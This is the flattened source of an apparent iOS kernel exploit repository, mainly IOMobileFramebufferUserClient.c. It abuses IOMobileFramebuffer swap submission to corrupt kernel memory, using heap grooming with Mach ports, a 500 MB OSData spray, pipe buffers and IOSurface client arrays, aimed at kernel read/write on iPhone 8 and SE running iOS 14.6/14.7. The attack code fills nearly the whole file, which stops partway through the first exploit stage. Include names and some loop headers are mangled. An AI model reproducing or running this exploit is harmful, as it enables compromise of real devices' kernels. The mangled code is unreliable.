├── IOMobileFramebufferUserClient.c ├── IOMobileFramebufferUserClient.h ├── LICENSE ├── Makefile ├── README.md ├── alloc_averager.py ├── array.c ├── array.h ├── ent.xml ├── iokit.h ├── kernel_hooks.c ├── kernel_hooks.h └── xnuspy_ctl.h /IOMobileFramebufferUserClient.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #include "array.h" 15 | #include "iokit.h" 16 | 17 | #ifdef SAMPLING_MEMORY 18 | #include "kernel_hooks.h" 19 | #include "xnuspy_ctl.h" 20 | #endif 21 | 22 | /* For iPhone 8, 14.6, 30 seconds after boot */ 23 | #define GUESSED_OSDATA_BUFFER_PTR (0xffffffe8dd594000uLL) 24 | 25 | /* For iPhone SE (2016), 14.7, 30 seconds after boot */ 26 | /* #define GUESSED_OSDATA_BUFFER_PTR (0xfffffff9942d0000uLL) */ 27 | 28 | struct ool_msg { 29 | mach_msg_header_t hdr; 30 | mach_msg_body_t body; 31 | mach_msg_ool_ports_descriptor_t ool_ports_desc; 32 | }; 33 | 34 | static mach_port_t kalloc(size_t len){ 35 | mach_port_t recv_port; 36 | kern_return_t kret = mach_port_allocate(mach_task_self(), 37 | MACH_PORT_RIGHT_RECEIVE, &recv_port); 38 | 39 | if(kret){ 40 | printf("%s: mach_port_allocate %s\n", __func__, mach_error_string(kret)); 41 | return MACH_PORT_NULL; 42 | } 43 | 44 | mach_port_limits_t limits = {0}; 45 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE; 46 | mach_msg_type_number_t cnt = MACH_PORT_LIMITS_INFO_COUNT; 47 | mach_port_set_attributes(mach_task_self(), recv_port, MACH_PORT_LIMITS_INFO, 48 | (mach_port_info_t)&limits, cnt); 49 | 50 | size_t port_count = len / 8; 51 | 52 | /* calloc for MACH_PORT_NULL */ 53 | mach_port_t *ports = calloc(port_count, sizeof(mach_port_t)); 54 | 55 | struct ool_msg oolmsg = {0}; 56 | oolmsg.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | 57 | MACH_MSGH_BITS_COMPLEX; 58 | oolmsg.hdr.msgh_size = sizeof(struct ool_msg); 
59 | oolmsg.hdr.msgh_remote_port = recv_port; 60 | oolmsg.hdr.msgh_local_port = MACH_PORT_NULL; 61 | oolmsg.hdr.msgh_id = 0xaabbccdd; 62 | oolmsg.body.msgh_descriptor_count = 1; 63 | 64 | mach_msg_ool_ports_descriptor_t *opd = &oolmsg.ool_ports_desc; 65 | 66 | opd->address = ports; 67 | opd->count = port_count; 68 | opd->deallocate = 0; 69 | opd->copy = MACH_MSG_PHYSICAL_COPY; 70 | opd->disposition = MACH_MSG_TYPE_MAKE_SEND; 71 | opd->type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 72 | 73 | kret = mach_msg(&oolmsg.hdr, MACH_SEND_MSG, sizeof(oolmsg), 0, 74 | MACH_PORT_NULL, 0, MACH_PORT_NULL); 75 | 76 | if(kret){ 77 | printf("%s: mach_msg %s\n", __func__, mach_error_string(kret)); 78 | return MACH_PORT_NULL; 79 | } 80 | 81 | return recv_port; 82 | } 83 | 84 | static io_connect_t IOMobileFramebufferUserClient_uc(void){ 85 | kern_return_t kret = KERN_SUCCESS; 86 | io_connect_t IOMobileFramebufferUserClient_user_client = IO_OBJECT_NULL; 87 | const char *name = "IOMobileFramebuffer"; 88 | 89 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, 90 | IOServiceMatching(name)); 91 | 92 | if(!service){ 93 | printf("%s: IOServiceGetMatchingService returned NULL\n", __func__); 94 | return IO_OBJECT_NULL; 95 | } 96 | 97 | int type = 0; 98 | kret = IOServiceOpen(service, mach_task_self(), type, 99 | &IOMobileFramebufferUserClient_user_client); 100 | 101 | if(kret){ 102 | printf("%s: IOServiceOpen returned %s\n", __func__, 103 | mach_error_string(kret)); 104 | return IO_OBJECT_NULL; 105 | } 106 | 107 | return IOMobileFramebufferUserClient_user_client; 108 | } 109 | 110 | static io_connect_t IOSurfaceRootUserClient_uc(void){ 111 | kern_return_t kret = KERN_SUCCESS; 112 | io_connect_t IOSurfaceRootUserClient_user_client = IO_OBJECT_NULL; 113 | const char *name = "IOSurfaceRoot"; 114 | 115 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, 116 | IOServiceMatching(name)); 117 | 118 | if(!service){ 119 | printf("%s: IOServiceGetMatchingService 
returned NULL\n", __func__); 120 | return IO_OBJECT_NULL; 121 | } 122 | 123 | int type = 0; 124 | kret = IOServiceOpen(service, mach_task_self(), type, 125 | &IOSurfaceRootUserClient_user_client); 126 | 127 | if(kret){ 128 | printf("%s: IOServiceOpen returned %s\n", __func__, 129 | mach_error_string(kret)); 130 | return IO_OBJECT_NULL; 131 | } 132 | 133 | return IOSurfaceRootUserClient_user_client; 134 | } 135 | 136 | static int create_surface(io_connect_t uc){ 137 | /* Thanks @bazad */ 138 | struct _IOSurfaceFastCreateArgs { 139 | uint64_t address; 140 | uint32_t width; 141 | uint32_t height; 142 | uint32_t pixel_format; 143 | uint32_t bytes_per_element; 144 | uint32_t bytes_per_row; 145 | uint32_t alloc_size; 146 | }; 147 | 148 | struct IOSurfaceLockResult { 149 | uint8_t _pad1[0x18]; 150 | uint32_t surface_id; 151 | uint8_t _pad2[0xf60-0x18-0x4]; 152 | }; 153 | 154 | struct _IOSurfaceFastCreateArgs create_args = {0}; 155 | create_args.width = 100; 156 | create_args.height = 100; 157 | /* below works */ 158 | create_args.pixel_format = 0x42475241; 159 | create_args.alloc_size = 0; 160 | 161 | struct IOSurfaceLockResult lock_result; 162 | size_t lock_result_size = sizeof(lock_result); 163 | 164 | kern_return_t kret = IOConnectCallMethod(uc, 6, NULL, 0, &create_args, 165 | sizeof(create_args), NULL, NULL, &lock_result, &lock_result_size); 166 | 167 | if(kret) 168 | return -1; 169 | 170 | return lock_result.surface_id; 171 | } 172 | 173 | static int create_swap(io_connect_t uc){ 174 | uint64_t swap_id; 175 | uint32_t cnt = 1; 176 | 177 | kern_return_t kret = IOConnectCallScalarMethod(uc, 4, NULL, 0, 178 | &swap_id, &cnt); 179 | 180 | if(kret) 181 | return -1; 182 | 183 | return swap_id; 184 | } 185 | 186 | static bool cancel_swap(io_connect_t uc, int swap_id){ 187 | uint64_t in = (uint64_t)swap_id; 188 | 189 | kern_return_t kret = IOConnectCallScalarMethod(uc, 52, &in, 190 | 1, NULL, NULL); 191 | 192 | if(kret){ 193 | printf("%s: s_swap_cancel failed: %s\n", 
__func__, 194 | mach_error_string(kret)); 195 | return false; 196 | } 197 | 198 | return true; 199 | } 200 | 201 | static bool submit_stagen_swap(io_connect_t uc, 202 | uint64_t iosurfaceroot_kaddr, uint64_t recursive_lock_kaddr, 203 | uint64_t plus_c0_kptr, uint64_t device_cache_kaddr, 204 | int *swap_id_out){ 205 | static uint64_t a = 0; 206 | kern_return_t kret = KERN_SUCCESS; 207 | 208 | if(!a){ 209 | kret = vm_allocate(mach_task_self(), (vm_address_t *)&a, 0x4000, 1); 210 | 211 | if(kret){ 212 | printf("%s: vm_allocate: %s\n", __func__, 213 | mach_error_string(kret)); 214 | *swap_id_out = 0; 215 | return false; 216 | } 217 | } 218 | 219 | int swap_id = create_swap(uc); 220 | 221 | if(swap_id == -1){ 222 | printf("%s: failed to make swap\n", __func__); 223 | *swap_id_out = 0; 224 | return false; 225 | } 226 | 227 | uint8_t swap_submit_in[0x280]; 228 | memset(swap_submit_in, 0, sizeof(swap_submit_in)); 229 | 230 | /* surface+0x28: IOSurfaceRoot, must point to something valid 231 | * for the 10-byte zero primitive */ 232 | *(uint64_t *)(swap_submit_in + 0x67) = iosurfaceroot_kaddr; 233 | 234 | /* surface+0x38: must be non-NULL so our swap is registered 235 | * in the surface array */ 236 | *(uint64_t *)(swap_submit_in + 0x77) = 0x4141414141414141; 237 | 238 | /* surface+0x40: must be the same as *(device_cache+0x38) for the 239 | * 10-byte zero primitive we have */ 240 | *(uint64_t *)(swap_submit_in + 0x97) = device_cache_kaddr + 0x38; 241 | 242 | /* surface+0x48: IOSurfaceDeviceCache pointer */ 243 | *(uint64_t *)(swap_submit_in + 0x9f) = device_cache_kaddr; 244 | 245 | /* surface+0x80: IORecursiveLock */ 246 | *(uint64_t *)(swap_submit_in + 0x11b) = recursive_lock_kaddr; 247 | 248 | /* surface+0xb0: size passed to IOMalloc_external * 8 249 | * 250 | * Make this large so we bail before the phone tries to do 251 | * a virtual method call with a pointer we can't guess 252 | * inside IOSurfaceClient::init */ 253 | *(uint32_t *)(swap_submit_in + 0x14b) = 0x7fffffff; 
254 | 255 | /* surface+0xc0: kernel pointer, can do an arbitrary decrement/ 256 | * increment with *(surface+0xc0)+0x14 */ 257 | *(uint64_t *)(swap_submit_in + 0x15b) = plus_c0_kptr; 258 | 259 | *(uint64_t *)(swap_submit_in + 0x38) = a; 260 | *(uint32_t *)(swap_submit_in + 0x40) = swap_id; 261 | 262 | /* Enable all layers so we can control more of the 263 | * type confused IOSurface */ 264 | *(uint32_t *)(swap_submit_in + 0xc8) = (1 << 2) | (1 << 1) | (1 << 0); 265 | 266 | /* Prevent this swap from being dropped inside swap_start_gated 267 | * (will be considered as a "no-op swap" otherwise) */ 268 | *(uint32_t *)(swap_submit_in + 0xcc) = 0x42424242; 269 | 270 | /* This must not be 0, 2, 9, 12, or 13, otherwise the most recently 271 | * submitted swap will not show up at UnifiedPipeline+0xb18 */ 272 | *(uint32_t *)(swap_submit_in + 0xf4) = 0x100; 273 | 274 | /* Set all to 4 so the above is recorded in the swap object */ 275 | *(uint32_t *)(swap_submit_in + 0x100) = 4; 276 | *(uint32_t *)(swap_submit_in + 0x104) = 4; 277 | *(uint32_t *)(swap_submit_in + 0x108) = 4; 278 | 279 | /* Shared client id */ 280 | *(uint8_t *)(swap_submit_in + 0x157) = 0; 281 | *(uint8_t *)(swap_submit_in + 0x158) = 0; 282 | 283 | kret = IOConnectCallStructMethod(uc, 5, swap_submit_in, 284 | sizeof(swap_submit_in), NULL, NULL); 285 | 286 | if(kret){ 287 | printf("%s: swap_submit: %s\n", __func__, mach_error_string(kret)); 288 | *swap_id_out = 0; 289 | return false; 290 | } 291 | 292 | *swap_id_out = swap_id; 293 | 294 | return true; 295 | } 296 | 297 | /* Keep track of the ports that external method 83 produces so we 298 | * can clean them up after kernel read/write is obtained */ 299 | static struct array *g_increment32_n_ports = NULL; 300 | 301 | static bool increment32_n(uint64_t kaddr, uint32_t times){ 302 | static io_connect_t iomfbuc = IO_OBJECT_NULL; 303 | 304 | if(!iomfbuc){ 305 | iomfbuc = IOMobileFramebufferUserClient_uc(); 306 | 307 | if(!iomfbuc){ 308 | printf("%s: failed making 
iomfb user client\n", __func__); 309 | return false; 310 | } 311 | } 312 | 313 | if(!g_increment32_n_ports){ 314 | g_increment32_n_ports = array_new(); 315 | 316 | if(!g_increment32_n_ports){ 317 | printf("%s: failed to allocate array for ports\n", __func__); 318 | return false; 319 | } 320 | } 321 | 322 | int swap_id; 323 | 324 | /* Using IOSurface::increment_use_count, this alone is enough to 325 | * call it */ 326 | if(!submit_stagen_swap(iomfbuc, 0, 0, kaddr - 0x14, 0, &swap_id)) 327 | return false; 328 | 329 | for(uint32_t i=0; i 0; i += 8){ 353 | ret += (val % 255) << i; 354 | val /= 255; 355 | } 356 | 357 | return ret + 0x01010101; 358 | } 359 | 360 | struct set_value_spray { 361 | uint32_t surface_id; 362 | uint32_t pad; 363 | 364 | /* Serialized XML */ 365 | uint32_t set_value_data[7]; 366 | 367 | /* OSData spray data */ 368 | uint8_t osdata_spray[]; 369 | }; 370 | 371 | static uint32_t g_cur_osdata_spray_key = 0; 372 | static struct set_value_spray *g_spray_data_one_page = NULL; 373 | static struct set_value_spray *g_spray_data_two_pages = NULL; 374 | static struct set_value_spray *g_spray_data_three_pages = NULL; 375 | static struct set_value_spray *g_spray_data_four_pages = NULL; 376 | static uint8_t *g_spray_junk_buf_one_page = NULL; 377 | static uint8_t *g_spray_junk_buf_two_pages = NULL; 378 | static uint8_t *g_spray_junk_buf_three_pages = NULL; 379 | static uint8_t *g_spray_junk_buf_four_pages = NULL; 380 | static bool g_osdata_spray_inited = false; 381 | 382 | static void osdata_spray_init(void){ 383 | g_spray_data_one_page = malloc(sizeof(struct set_value_spray) + 0x4000); 384 | 385 | if(!g_spray_data_one_page) 386 | return; 387 | 388 | g_spray_data_two_pages = malloc(sizeof(struct set_value_spray) + 0x8000); 389 | 390 | if(!g_spray_data_two_pages) 391 | return; 392 | 393 | g_spray_data_three_pages = malloc(sizeof(struct set_value_spray) + 0xc000); 394 | 395 | if(!g_spray_data_three_pages) 396 | return; 397 | 398 | g_spray_data_four_pages = 
malloc(sizeof(struct set_value_spray) + 0x10000); 399 | 400 | if(!g_spray_data_four_pages) 401 | return; 402 | 403 | g_spray_junk_buf_one_page = malloc(0x4000); 404 | 405 | if(!g_spray_junk_buf_one_page) 406 | return; 407 | 408 | g_spray_junk_buf_two_pages = malloc(0x8000); 409 | 410 | if(!g_spray_junk_buf_two_pages) 411 | return; 412 | 413 | g_spray_junk_buf_three_pages = malloc(0xc000); 414 | 415 | if(!g_spray_junk_buf_three_pages) 416 | return; 417 | 418 | g_spray_junk_buf_four_pages = malloc(0x10000); 419 | 420 | if(!g_spray_junk_buf_four_pages) 421 | return; 422 | 423 | memset(g_spray_junk_buf_one_page, '1', 0x4000); 424 | memset(g_spray_junk_buf_two_pages, '2', 0x8000); 425 | memset(g_spray_junk_buf_three_pages, '3', 0xc000); 426 | memset(g_spray_junk_buf_four_pages, '4', 0x10000); 427 | 428 | g_osdata_spray_inited = true; 429 | } 430 | 431 | static bool osdata_spray_free(io_connect_t iosruc, int surface_id, 432 | uint32_t spray_key){ 433 | uint64_t delete_in[] = { (uint64_t)surface_id, spray_key, 0 }; 434 | 435 | uint8_t delete_out[4]; 436 | size_t delete_outcnt = sizeof(delete_out); 437 | 438 | kern_return_t kret = IOConnectCallStructMethod(iosruc, 11, 439 | delete_in, sizeof(delete_in), delete_out, &delete_outcnt); 440 | 441 | if(kret){ 442 | printf("%s: s_delete_value failed for key %#x: %s\n", __func__, 443 | spray_key, mach_error_string(kret)); 444 | return false; 445 | } 446 | 447 | return true; 448 | } 449 | 450 | static bool osdata_spray_internal(io_connect_t iosruc, 451 | int surface_id, uint32_t *keyp, uint8_t *spray_data, 452 | size_t spray_sz, struct set_value_spray *spray_buf){ 453 | size_t aligned_spray_sz = spray_sz; 454 | 455 | if(spray_sz & 0x3fffuLL) 456 | aligned_spray_sz = (spray_sz + 0x4000) & ~(0x3fffuLL); 457 | 458 | uint32_t cur_spray_key = transpose(g_cur_osdata_spray_key); 459 | 460 | spray_buf->surface_id = surface_id; 461 | spray_buf->pad = 0; 462 | 463 | uint32_t *set_value_data = spray_buf->set_value_data; 464 | 465 | 
*set_value_data++ = kOSSerializeBinarySignature; 466 | *set_value_data++ = kOSSerializeEndCollection | kOSSerializeArray | 1; 467 | *set_value_data++ = kOSSerializeEndCollection | kOSSerializeDictionary | 1; 468 | *set_value_data++ = kOSSerializeSymbol | 5; 469 | *set_value_data++ = cur_spray_key; 470 | *set_value_data++ = 0; 471 | *set_value_data++ = kOSSerializeEndCollection | kOSSerializeData | aligned_spray_sz; 472 | 473 | memcpy(spray_buf->osdata_spray, spray_data, spray_sz); 474 | 475 | uint32_t out = 0; 476 | size_t outsz = sizeof(out); 477 | 478 | kern_return_t kret = IOConnectCallStructMethod(iosruc, 9, spray_buf, 479 | sizeof(struct set_value_spray) + aligned_spray_sz, &out, &outsz); 480 | 481 | if(kret){ 482 | printf("%s: s_set_value failed: %s\n", __func__, 483 | mach_error_string(kret)); 484 | return false; 485 | } 486 | 487 | *keyp = cur_spray_key; 488 | 489 | g_cur_osdata_spray_key++; 490 | 491 | return true; 492 | } 493 | 494 | static bool osdata_junk_spray(io_connect_t iosruc, int surface_id, 495 | size_t sz, uint32_t *keyp){ 496 | if(!g_osdata_spray_inited){ 497 | osdata_spray_init(); 498 | 499 | if(!g_osdata_spray_inited){ 500 | printf("%s: failed to init osdata spray globals\n", __func__); 501 | return false; 502 | } 503 | } 504 | 505 | struct set_value_spray *spray_buf; 506 | uint8_t *buf; 507 | 508 | if(sz <= 0x4000){ 509 | spray_buf = g_spray_data_one_page; 510 | buf = g_spray_junk_buf_one_page; 511 | } 512 | else if(sz <= 0x8000){ 513 | spray_buf = g_spray_data_two_pages; 514 | buf = g_spray_junk_buf_two_pages; 515 | } 516 | else if(sz <= 0xc000){ 517 | spray_buf = g_spray_data_three_pages; 518 | buf = g_spray_junk_buf_three_pages; 519 | } 520 | else if(sz <= 0x10000){ 521 | spray_buf = g_spray_data_four_pages; 522 | buf = g_spray_junk_buf_four_pages; 523 | } 524 | else{ 525 | printf("%s: unsupported size %#zx\n", __func__, sz); 526 | return false; 527 | } 528 | 529 | return osdata_spray_internal(iosruc, surface_id, keyp, buf, 530 | sz, 
spray_buf); 531 | } 532 | 533 | static bool osdata_spray(io_connect_t iosruc, int surface_id, 534 | uint8_t *data, size_t sz, uint32_t *keyp){ 535 | if(!g_osdata_spray_inited){ 536 | osdata_spray_init(); 537 | 538 | if(!g_osdata_spray_inited){ 539 | printf("%s: failed to init osdata spray globals\n", __func__); 540 | return false; 541 | } 542 | } 543 | 544 | struct set_value_spray *spray_buf; 545 | 546 | if(sz <= 0x4000) 547 | spray_buf = g_spray_data_one_page; 548 | else if(sz <= 0x8000) 549 | spray_buf = g_spray_data_two_pages; 550 | else if(sz <= 0xc000) 551 | spray_buf = g_spray_data_three_pages; 552 | else if(sz <= 0x10000) 553 | spray_buf = g_spray_data_four_pages; 554 | else{ 555 | printf("%s: unsupported size %#zx\n", __func__, sz); 556 | return false; 557 | } 558 | 559 | return osdata_spray_internal(iosruc, surface_id, keyp, data, 560 | sz, spray_buf); 561 | } 562 | 563 | static int ptrcmp(const void *_a, const void *_b){ 564 | const uintptr_t a = *(uintptr_t *)_a; 565 | const uintptr_t b = *(uintptr_t *)_b; 566 | 567 | if(a < b) 568 | return -1; 569 | else if(a == b) 570 | return 0; 571 | else 572 | return 1; 573 | } 574 | 575 | struct pipe_hole_filler { 576 | int rfd, wfd; 577 | uint64_t inferred_pipebuf_kva; 578 | }; 579 | 580 | struct iosruc_hole_filler { 581 | io_connect_t iosruc; 582 | uint64_t inferred_client_array_kva; 583 | struct array *surface_ids; 584 | }; 585 | 586 | #ifdef SAMPLING_MEMORY 587 | extern void *g_osdata_kaddrs[8000]; 588 | extern uint64_t g_osdata_kaddrs_idx; 589 | extern bool g_record_osdata_kaddrs; 590 | 591 | static void sample_kernel_map(void){ 592 | struct array *osdata_kaddrs = array_new(); 593 | 594 | /* Allocations should be contiguous after the 1000th one */ 595 | for(int i=1000; ilen; i++){ 604 | void *kptr = osdata_kaddrs->items[i]; 605 | 606 | if(i == 0) 607 | puts(""); 608 | else{ 609 | uint64_t before = (uint64_t)osdata_kaddrs->items[i-1]; 610 | uint64_t dist = (uint64_t)kptr - before; 611 | 612 | dists[i] = dist; 
613 | 614 | if(dist != 0x10000){ 615 | printf("%s: WARNING: %p [%#llx bytes from behind]\n", 616 | __func__, kptr, dist); 617 | } 618 | } 619 | } 620 | 621 | printf("%s: to add to alloc_averager.py:\n", __func__); 622 | 623 | void *last = osdata_kaddrs->items[osdata_kaddrs->len-1]; 624 | 625 | printf("[%p, %p],\n", osdata_kaddrs->items[0], 626 | (void *)((uintptr_t)last + 0x100000 - 0x4000)); 627 | } 628 | 629 | static bool install_kernel_memory_allocate_hook(void){ 630 | long SYS_xnuspy_ctl; 631 | size_t oldlen = sizeof(long); 632 | int res = sysctlbyname("kern.xnuspy_ctl_callnum", &SYS_xnuspy_ctl, 633 | &oldlen, NULL, 0); 634 | 635 | if(res == -1){ 636 | printf("sysctlbyname with kern.xnuspy_ctl_callnum failed: %s\n", 637 | strerror(errno)); 638 | return false; 639 | } 640 | 641 | res = syscall(SYS_xnuspy_ctl, XNUSPY_CHECK_IF_PATCHED, 0, 0, 0); 642 | 643 | if(res != 999){ 644 | printf("xnuspy_ctl isn't present?\n"); 645 | return false; 646 | } 647 | 648 | extern uint64_t kernel_slide; 649 | res = syscall(SYS_xnuspy_ctl, XNUSPY_CACHE_READ, KERNEL_SLIDE, 650 | &kernel_slide, 0, 0); 651 | 652 | if(res){ 653 | printf("failed reading kernel slide from xnuspy cache\n"); 654 | return false; 655 | } 656 | 657 | /* iPhone 8, 14.6 */ 658 | /* uint64_t kma = 0xfffffff007b2e66c; */ 659 | 660 | /* iPhone SE (2016), 14.7 */ 661 | uint64_t kma = 0xfffffff0071f1384; 662 | 663 | res = syscall(SYS_xnuspy_ctl, XNUSPY_INSTALL_HOOK, 664 | kma, _kernel_memory_allocate, &kernel_memory_allocate); 665 | 666 | if(res) 667 | return false; 668 | 669 | return true; 670 | } 671 | #endif 672 | 673 | static bool exploit_stage1(struct array **iosruc_hole_fillersp, 674 | struct array **pipe_hole_fillersp, uint64_t *anchor_alloc_kaddrp){ 675 | kern_return_t kret = KERN_SUCCESS; 676 | 677 | /* Shape the kernel virtual address space. 678 | * 1. 
Fill up the kalloc map */ 679 | 680 | struct array *kalloc_map_filler_recvs = array_new(); 681 | 682 | for(int i=0; i<2000; i++){ 683 | mach_port_t r = kalloc(0x10000); 684 | 685 | if(!r){ 686 | printf("%s: failed kalloc map filler recv %d\n", __func__, i); 687 | break; 688 | } 689 | 690 | array_insert(kalloc_map_filler_recvs, (void *)(uintptr_t)r); 691 | } 692 | 693 | io_connect_t osdata_spray_iosruc = IOSurfaceRootUserClient_uc(); 694 | 695 | if(!osdata_spray_iosruc){ 696 | printf("%s: failed making IOSurfaceRootUserClient?\n", __func__); 697 | return false; 698 | } 699 | 700 | int osdata_spray_surface = create_surface(osdata_spray_iosruc); 701 | 702 | if(osdata_spray_surface == -1){ 703 | printf("%s: failed to create spray IOSurface\n", __func__); 704 | return false; 705 | } 706 | 707 | struct array *iosruc_hole_fillers = array_new(); 708 | 709 | /* Free 16mb to the left of the anchor alloc */ 710 | const uint64_t anchor_alloc_free_mbs = 16; 711 | const uint64_t anchor_alloc_free_bytes = 0x100000 * anchor_alloc_free_mbs; 712 | const uint32_t spray_sz = 0x10000; 713 | 714 | /* How many 0x10000-byte holes we create to the left of the 715 | * anchor alloc */ 716 | uint32_t nholes_left = anchor_alloc_free_bytes / spray_sz; 717 | 718 | for(int i=0; i<(nholes_left + 20) / 2; i++){ 719 | struct iosruc_hole_filler *ihf = malloc(sizeof(*ihf)); 720 | 721 | io_connect_t uc = IOSurfaceRootUserClient_uc(); 722 | 723 | if(!uc){ 724 | printf("%s: could not make hole filler iosruc @ %d\n", 725 | __func__, i); 726 | return false; 727 | } 728 | 729 | ihf->iosruc = uc; 730 | ihf->inferred_client_array_kva = 0; 731 | ihf->surface_ids = array_new(); 732 | 733 | array_insert(iosruc_hole_fillers, ihf); 734 | } 735 | 736 | /* We'll also be filling holes with 0x10000-byte pipe buffers later */ 737 | struct array *pipe_hole_fillers = array_new(); 738 | 739 | for(int i=0; i<(nholes_left + 20) / 2; i++){ 740 | struct pipe_hole_filler *phf = malloc(sizeof(*phf)); 741 | int p[2]; 742 | 743 | 
if(pipe(p) == -1){ 744 | printf("%s: pipe call %d failed: %s\n", __func__, i, 745 | strerror(errno)); 746 | return false; 747 | } 748 | 749 | phf->rfd = p[0]; 750 | phf->wfd = p[1]; 751 | phf->inferred_pipebuf_kva = 0; 752 | 753 | array_insert(pipe_hole_fillers, phf); 754 | } 755 | 756 | /* Prep for future kernel map IOSurfaceClient arrays: 757 | * This will set the surface client array capacity for the provider to 758 | * all the iosruc's, which will make just one IOSurfaceClient allocation 759 | * cause a kernel map allocation */ 760 | struct iosruc_hole_filler *ihf0 = iosruc_hole_fillers->items[0]; 761 | int nsurfaces = 4095; 762 | int *surfaces = malloc(sizeof(int) * nsurfaces); 763 | 764 | for(int k=0; kiosruc); 766 | 767 | if(!surfaces[k]){ 768 | printf("%s: could not make surface for hole filler 0\n", __func__); 769 | return false; 770 | } 771 | } 772 | 773 | /* Free all the surfaces except one so we can create new 774 | * surfaces later */ 775 | for(int k=0; kiosruc, 1, &surface, 779 | 1, NULL, NULL); 780 | 781 | if(kret){ 782 | printf("%s: s_release_surface failed: %s\n", __func__, 783 | mach_error_string(kret)); 784 | return false; 785 | } 786 | } 787 | 788 | array_insert(ihf0->surface_ids, (void *)(uintptr_t)surfaces[nsurfaces-1]); 789 | 790 | free(surfaces); 791 | surfaces = NULL; 792 | 793 | /* 2. 
Spray 500 MB into the kernel map via OSData */ 794 | struct set_value_spray { 795 | uint32_t surface_id; 796 | uint32_t pad; 797 | 798 | /* Serialized XML */ 799 | uint32_t set_value_data[7]; 800 | 801 | /* OSData spray data */ 802 | uint8_t osdata_spray[]; 803 | }; 804 | 805 | const uint32_t mbs = 500; 806 | const size_t total_spray = 0x100000 * mbs; 807 | const uint32_t nsprays = total_spray / spray_sz; 808 | 809 | struct array *osdata_spray_keys = array_new(); 810 | uint8_t *osdata_spray_buf = malloc(spray_sz); 811 | 812 | #ifdef SAMPLING_MEMORY 813 | if(!install_kernel_memory_allocate_hook()) 814 | return false; 815 | 816 | g_record_osdata_kaddrs = true; 817 | #endif 818 | 819 | uint32_t osdata_spray_buf_constant = 0x12345678; 820 | 821 | /* Record the page number as well as the index into osdata_spray_keys */ 822 | for(int i=0; ilen; i++){ 875 | uint32_t key = (uint32_t)(uintptr_t)osdata_spray_keys->items[i]; 876 | 877 | uint32_t get_value_input[4]; 878 | memset(get_value_input, 0, sizeof(get_value_input)); 879 | 880 | get_value_input[0] = osdata_spray_surface; 881 | get_value_input[2] = key; 882 | 883 | size_t readback_buf_sz = 0x10 + spray_sz; 884 | 885 | kret = IOConnectCallStructMethod(osdata_spray_iosruc, 10, 886 | get_value_input, sizeof(get_value_input), readback_buf, 887 | &readback_buf_sz); 888 | 889 | if(kret){ 890 | printf("%s: failed to read back OSData buffer for key %#x: %s\n", 891 | __func__, key, mach_error_string(kret)); 892 | return false; 893 | } 894 | 895 | uint8_t *readback_buf_orig = readback_buf; 896 | 897 | readback_buf += 0x10; 898 | 899 | for(int k=0; k<4; k++){ 900 | uint32_t constant = *(uint32_t *)readback_buf; 901 | 902 | if(constant != osdata_spray_buf_constant){ 903 | uint32_t pagenum = *(uint32_t *)(readback_buf + 0x4); 904 | uint32_t osdata_spray_key_idx = *(uint32_t *)(readback_buf + 0x8); 905 | 906 | printf("%s: pagenum %d keyidx %d\n", __func__,pagenum, 907 | osdata_spray_key_idx); 908 | 909 | anchor_alloc = 
osdata_spray_key_idx; 910 | anchor_alloc_key = (uint32_t)(uintptr_t)osdata_spray_keys->items[anchor_alloc]; 911 | anchor_alloc_kaddr -= (pagenum * 0x4000); 912 | 913 | break; 914 | } 915 | 916 | readback_buf += 0x4000; 917 | } 918 | 919 | if(anchor_alloc != -1){ 920 | printf("%s: found OSData buffer for key %#x at %#lx\n", 921 | __func__, anchor_alloc_key, anchor_alloc_kaddr); 922 | break; 923 | } 924 | 925 | readback_buf = readback_buf_orig; 926 | memset(readback_buf, 0, spray_sz); 927 | } 928 | 929 | if(anchor_alloc == -1){ 930 | printf("%s: our guess was wrong, we may panic\n", __func__); 931 | return false; 932 | } 933 | 934 | /* Free 16 MB worth of allocations to the left of the anchor alloc */ 935 | for(int i=anchor_alloc-nholes_left; iitems[i]; 937 | 938 | if(!osdata_spray_free(osdata_spray_iosruc, osdata_spray_surface, key)){ 939 | printf("%s: left: failed freeing data for key %#x\n", 940 | __func__, key); 941 | return false; 942 | } 943 | 944 | osdata_spray_keys->items[i] = (void *)-1; 945 | } 946 | 947 | uint64_t cur_left_hole_kva = anchor_alloc_kaddr - (spray_sz * nholes_left); 948 | 949 | /* We try and get a layout like this 950 | * [IOSurfaceClient array][pipe buffer][anchor alloc] 951 | * or like this 952 | * [pipe buffer][IOSurfaceClient array][anchor alloc] 953 | * because each time we use the 32-bit increment, a Mach port is 954 | * created, and ports are not an unlimited resource. Both these 955 | * arrays have the same length so this is safe */ 956 | for(int i=0; ilen; i++){ 957 | bool last_ihf = (i == iosruc_hole_fillers->len - 1); 958 | 959 | /* Exclude the first iosruc hole filler, because its IOSurfaceClient 960 | * array was allocated way before */ 961 | struct iosruc_hole_filler *ihf = NULL; 962 | 963 | if(!last_ihf) 964 | ihf = iosruc_hole_fillers->items[i+1]; 965 | 966 | struct pipe_hole_filler *phf = pipe_hole_fillers->items[i]; 967 | 968 | /* We're betting on the KVA space being laid out as described 969 | * above, fingers crossed... 
*/ 970 | if(!last_ihf) 971 | ihf->inferred_client_array_kva = cur_left_hole_kva; 972 | 973 | phf->inferred_pipebuf_kva = cur_left_hole_kva + spray_sz; 974 | 975 | cur_left_hole_kva += (spray_sz * 2); 976 | 977 | uint8_t contents[0x10000]; 978 | memset(contents, i, sizeof(contents)); 979 | 980 | int surface_id = 0; 981 | 982 | if(!last_ihf) 983 | surface_id = create_surface(ihf->iosruc); 984 | 985 | int write_res = write(phf->wfd, contents, sizeof(contents)); 986 | 987 | if(!last_ihf && surface_id == -1){ 988 | printf("%s: failed to create IOSurfaceClient array for ihf %d\n", 989 | __func__, i); 990 | return false; 991 | } 992 | 993 | if(write_res == -1){ 994 | printf("%s: write failed for phf %d\n", __func__, i); 995 | return false; 996 | } 997 | 998 | if(!last_ihf) 999 | array_insert(ihf->surface_ids, (void *)(uintptr_t)surface_id); 1000 | } 1001 | 1002 | /* There's a good chance that the IOSurfaceRootUserClient's 1003 | * surface client array in the middle of this array falls in 1004 | * the middle of the holes we reclaimed. 
